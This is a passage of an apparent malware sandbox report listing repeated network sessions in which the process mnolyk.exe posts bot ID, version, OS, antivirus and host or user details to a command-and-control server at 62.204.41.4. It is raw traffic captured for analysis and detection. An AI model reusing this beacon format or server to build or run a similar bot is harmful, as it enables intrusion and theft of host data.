                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:01.375094891 CET682INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:01 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      23192.168.2.74974762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:03.176630020 CET455OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:03.239852905 CET455INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:03 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      230192.168.2.74995762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:01.557192087 CET683OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:01.622724056 CET683INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:01 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      231192.168.2.74995862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:01.789882898 CET684OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:01.854120970 CET684INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:01 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      232192.168.2.74995962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:02.027472973 CET685OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:02.092313051 CET685INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:02 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      233192.168.2.74996062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:02.273096085 CET686OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:02.335052013 CET686INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:02 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      234192.168.2.74996162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:02.522336006 CET687OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:02.587881088 CET687INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:02 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      235192.168.2.74996262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:02.769565105 CET688OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:02.835967064 CET688INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:02 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      236192.168.2.74996362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:03.026261091 CET689OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:03.091744900 CET689INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:03 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      237192.168.2.74996462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:03.280174017 CET690OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:03.343910933 CET690INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:03 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      238192.168.2.74996562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:03.533119917 CET691OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:03.596465111 CET691INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:03 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      239192.168.2.74996662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:03.777401924 CET692OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:03.841682911 CET692INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:03 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      24192.168.2.74974862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:03.424266100 CET456OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:03.489942074 CET456INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:03 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      240192.168.2.74996762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:04.009354115 CET693OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:04.074354887 CET693INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:04 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      241192.168.2.74996862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:04.244029045 CET694OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:04.307334900 CET694INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:04 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      242192.168.2.74996962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:04.479000092 CET695OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:04.542346001 CET695INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:04 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      243192.168.2.74997062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:04.713404894 CET696OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:04.776000023 CET696INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:04 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      244192.168.2.74997162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:04.988037109 CET697OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:05.052577972 CET697INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:05 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      245192.168.2.74997262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:05.232422113 CET698OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:05.295784950 CET698INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:05 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      246192.168.2.74997362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:05.465389967 CET699OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:05.528156042 CET699INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:05 GMT
                                                                      Content-Type: text/html; charset=UTF-8
